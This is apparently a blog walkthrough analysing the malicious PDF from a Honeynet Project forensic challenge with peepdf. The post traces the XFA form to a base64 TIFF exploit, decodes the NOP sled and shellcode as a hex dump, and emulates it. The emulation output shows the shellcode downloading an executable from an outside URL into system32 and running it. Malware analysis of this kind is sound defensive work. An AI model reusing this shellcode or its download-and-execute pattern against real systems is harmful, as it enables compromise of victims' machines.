Analysing the Honeynet Project challenge PDF file with peepdf (II) |
After the "useless" analysis of the fake objects now we can focus on the objects which will be parsed by the PDF reader:
/Catalog (27)
dictionary (28)
dictionary (22)
dictionary (23)
dictionary (22)
/Annot (24)
dictionary (23)
/Page (25)
/Pages (26)
/Page (25)
stream (21)
/Pages (26)If we take a look at the Catalog object...
PPDF> object 27
<< /AcroForm 28 0 R
/MarkInfo << /Marked true >>
/Pages 26 0 R
/Type /Catalog
/Lang en-us
/PageMode /UseAttachments >>
There is no presence of any triggers here (/OpenAction) or in the rest of the objects (/AA) so it seems that the /AcroForm element has something to say. Also, the suspicious object 21 (/EmbeddedFile) is related with this interactive form:
PPDF> references to 21
[28]
PPDF> object 28
<< /DA /Helv 0 Tf 0 g
/Fields [ 22 0 R ]
/XFA [ template 21 0 R ] >>In the dictionary of the form we can see that object 21 is a template and that there is a reference to a field object (object 22). So we continue analysing the field objects:
PPDF> object 22
<< /V
/T topmostSubform[0]
/Kids [ 23 0 R ] >>
PPDF> object 23
<< /Parent 22 0 R
/Kids [ 24 0 R ]
/T Page1[0] >>
PPDF> object 24
<< /Parent 23 0 R
/T ImageField1[0]
/Ff 65536
/MK << /TP 1
/IF << /A [ 0.0 1.0 ] >> >>
/F 4
/Rect [ 107.385 705.147 188.385 709.087 ]
/Type /Annot
/FT /Btn
/DA /CourierStd 10 Tf 0 g
/Subtype /Widget
/TU ImageField1
/P 25 0 R >>We arrive to the last field element, called ImageField1, which has a suspicious value for its /Ff element, 65536...Now it's time to take a look at the content of this field in the template (object 21):
...
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
...
Mmm...we have a TIFF image, CVE-2010-0188? The content is encoded with base64 so we put it in a variable and we decode it:
PPDF> set sh "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ..."
PPDF> set output variable raw_sh
PPDF> decode variable sh b64
49 49 2a 00 38 20 00 00 90 90 90 90 90 90 90 90 |II*.8 ..........|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
...
90 90 90 90 90 90 90 90 90 90 90 90 90 31 c9 dd |.............1..|
c5 b8 53 2c 18 36 d9 74 24 f4 5f b1 66 31 47 18 |..S,.6.t$._.f1G.|
83 c7 04 03 47 14 e2 a6 c7 08 6c 02 2b e0 f6 2b |....G.....l.+..+|
77 f3 76 7f 82 6a 94 85 79 89 b1 92 81 6d be 14 |w.v.j..y....m..|
32 0b d8 4d 09 d6 e3 c4 17 b0 8d 04 f1 56 bf c1 |2..M.........V..|
84 6d d2 c8 16 9f 93 f8 f2 05 01 11 85 a7 bc 83 |.m..............|
98 c0 78 c9 ff 1c ac 60 55 54 9d b4 62 87 87 d2 |..x....`UT..b...|
11 ba ac 11 42 7a 58 ea 80 ea 5d d2 41 53 c3 06 |....BzX...].AS..|
0e 1b 3b 70 36 c9 ef 6e 66 53 95 d4 d0 d4 30 b0 |..;p6..nfS....0.|
4a 74 ba 52 1a 67 9b d7 86 d2 7b af 2d 78 23 5d |Jt.R.g....{.-x#]|
cb e7 8e 73 88 05 41 69 11 bd 8f c4 5e 5c 6f a7 |...s..Ai....^\o.|
69 c6 e9 de 70 a6 9d 2b 4b 3e 50 ce 97 ad 2d e3 |i...p..+K>P...-.|
80 12 dc a7 28 0b 86 bd 15 a6 76 1e b0 11 91 4c |....(.....v....L|
a0 44 0d 95 e0 6d 24 1c fc d4 35 e7 cb b1 77 62 |.D...m$...5...wb|
92 a0 12 49 d2 6c de 0f fe 09 82 4e fc b7 24 3a |...I.l.....N..$:|
a4 0e 9f f0 98 58 46 ca 42 49 c2 1b 46 0b 02 f2 |.....XF.BI..F...|
9e b2 54 69 8b 62 5c 6d 92 78 fe 45 ef 4e 35 33 |..Ti.b\m.x.E.N53|
bb 93 0a 89 40 63 21 b4 ec fa 8a 20 77 9b 2a 50 |....@c!.... w.*P|
9a aa 38 5e 9f f5 42 63 8b fa 57 71 d5 dd 54 68 |..8^..Bc..Wq..Th|
2c 01 4e 9f 4d 36 52 af 45 4b 97 a2 6c 5f 88 e4 |,.N.M6R.EK..l_..|
08 6e b9 e3 f7 8e c6 f1 91 8d d6 f5 4f e0 e8 1e |.n..........O...|
73 03 f7 79 59 02 f0 84 b7 1b fa 9d c0 37 1d b9 |s..yY........7..|
a8 24 35 cc 3f 42 3d b7 0c 60 17 1a 7a 99 6f 51 |.$5.?B=..`..z.oQ|
75 9e 6d 54 8c 80 7e 93 8d e7 e6 33 1a 6c 69 f9 |u.mT..~....3.li.|
cd a3 eb 91 7e db c5 01 ee 4d 7f a8 9e f4 0b 64 |....~....M....d|
30 85 94 56 a3 10 74 c0 54 91 ef 62 d8 3c 93 25 |0..V..t.T..b.<.%|
7d d7 32 b5 ed 42 db 22 8b a3 57 c4 36 e3 e5 71 |}.2..B."..W.6..q|
d8 77 55 14 7b e4 1e 87 09 91 ce 22 96 3c 8f 90 |.wU.{......".<..|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
PPDF> reset output
Now we have the raw content in a variable and we are going to emulate the execution with the sctest wrapper:
PPDF> sctest variable raw_sh
verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 9172
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x0041767d =>
= "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x00417691 =>
= "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x00417699 =>
= "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x004176a4 =>
= "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x004176b1 =>
= "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7df20000 =>
none;
LPCSTR lpProcName = 0x004176b8 =>
= "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
LPTSTR lpBuffer = 0x0012fe7c =>
none;
UINT uSize = 32;
) = 19;
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x004176cb =>
= "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe";
LPCTSTR szFileName = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
UINT uCmdShow = 0;
) = 32;
void ExitThread (
DWORD dwExitCode = 32;
) = 0;Done! Finally we have the trigger and the executed payload of the malicious PDF file! This shellcode also tries to download a binary and execute it, but this time the URL is the real one :)
Analysing the Honeynet Project challenge PDF file with peepdf (I)
hey, hope you enjoyed the
hey, hope you enjoyed the challenge. :). it was designed to be fun.btw, it's interesting enough to see many submitter got confused with /Root. :).
Yeah!
Yeah! I really enjoyed it, it was interesting to see that behaviour :) Good work! ;)